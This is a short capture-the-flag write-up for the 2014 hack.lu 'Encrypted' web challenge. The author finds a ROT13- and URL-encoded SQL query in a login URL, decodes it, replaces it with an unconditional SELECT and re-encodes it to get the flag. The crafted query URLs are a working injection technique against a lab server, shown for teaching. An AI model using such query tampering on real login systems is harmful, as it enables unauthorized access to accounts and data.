Encrypted
https://wildwildweb.fluxfingers.net:1411
Solution
This was one of the easiest challenges in the 2014 hack.lu CTF, and it involved a simple web log in interface. Checking the page’s source code revealed nothing interesting so I entered a test username and password and was taken to a page telling me that the login had failed. Again, there was nothing interesting in the page’s source code. However, the URL of the log in failed page was:
https://wildwildweb.fluxfingers.net:1411/dologin.php?dhrel=FRYRPG+%60anzr%60+SEBZ+%60hfref%60+JURER+%60anzr%60+%3D+%27nnnn%27+NAQ+%60cnffjbeq%60+%3D+ZQ5%28%27oooo%27%29
i.e. as a massive flashing red light in an hacking challenge. Removing the URL encoding (using http://meyerweb.com/eric/tools/dencoder/) this became:
https://wildwildweb.fluxfingers.net:1411/dologin.php?dhrel=FRYRPG `anzr` SEBZ `hfref` JURER `anzr` = 'nnnn' NAQ `cnffjbeq` = ZQ5('oooo')
As an additional test I entered abcdef as the username and 12345 as the password and got:
https://wildwildweb.fluxfingers.net:1411/dologin.php?dhrel=FRYRPG `anzr` SEBZ `hfref` JURER `anzr` = 'nopqrs' NAQ `cnffjbeq` = ZQ5('12345')
abcdef seems to have become nopqrs and 12345 became 12345, so this is ROT13 encoding. ROT13 decoding (http://www.rot13.com) the whole URL we get:
https://wildwildweb.fluxfingers.net:1411/dologin.php?query=SELECT `name` FROM `users` WHERE `name` = 'abcdef' AND `password` = MD5('12345')
I.e., SQL is being past to the login page as a query. We change this to a query that will always work:
https://wildwildweb.fluxfingers.net:1411/dologin.php?query=SELECT `name` FROM `users`
ROT13 encode it:
https://wildwildweb.fluxfingers.net:1411/dologin.php?dhrel=FRYRPG `anzr` SEBZ `hfref`
URL encode it:
https://wildwildweb.fluxfingers.net:1411/dologin.php?dhrel=FRYRPG+%60anzr%60+SEBZ+%60hfref%60
And going to this URL we get the flag:
Encrypted Login
Hello admin! The flag is flag{nobody_needs_server_side_validation}.